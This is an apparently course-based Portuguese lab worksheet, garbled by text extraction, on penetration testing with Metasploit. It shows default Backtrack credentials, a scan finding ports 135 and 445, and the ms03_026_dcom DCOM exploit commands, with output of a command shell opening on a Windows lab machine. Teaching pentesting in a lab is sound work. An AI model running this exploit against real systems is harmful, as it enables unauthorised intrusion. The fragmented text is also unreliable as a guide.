Académique Documents
Professionnel Documents
Culture Documents
Para esta aula prtica, voc precisa ter o Virtualbox executando VMs.
Uma delas, Backtrack 5 contm vrias ferramentas, inclusive algumas para
se fazer testes de penetrao em sistemas, como o Metasploit Framework
que voc ir exercitar agora.
----------------------------------------------------------------------------------------------------------------------------OBJETIVOS DA AULA
Passw: toor
Login: Administrator
Passw:
Quais servios esto ativos ??? Servios ativos indicam por onde
se deve simular um teste de invaso, contra alguma
vulnerabilidade.
Ports: 135/TCP
445/TCP
open
open
msrpc
(servio = msrpc)
ds)
Quais servios esto ativos ??? Servios ativos indicam por onde
se deve simular um teste de invaso, contra alguma
vulnerabilidade.
Use o comando
Voc est
Framework
Veja
procurando
resultado.
um
exploit para
Metasploit.
DCOM,
dentro
do
retorno
o
exploit
windows/dcerpc/ms03_026_dcom e ser este exploit que utilizaremos
em nosso exemplo de teste de penetrao (tambm chamado de
teste de invaso e em ingls, pentest).
windows/dcerpc/ms03_026_dcom
use windows/dcerpc/ms03_026_dcom
msf exploit(ms_03_026_dcom)>
tcp:192.168.1.xxx[135]
[*] Sending exploit
[*] Command shell session 1 opened (192.168.1.113:37961 ->
192.168.1.112:4444) at 2013-06-21 19:43:08 -0400
.....
Microsoft Windows [version 5.2.3790]
Copyright 1985-2003 Microsoft Corp
C:\Windows\System32>
invadida.
CONCLUSO
A simulao por Testes de Penetrao (Pen Test) podem dar como resultado:
(a) uma invaso a um sistema operacional,
(b) ou o teste no conduz a nenhuma invaso.
Mostrando os resultados entre outras informaes.
para
nes
te nosso laboratrio.
set
PAYLOAD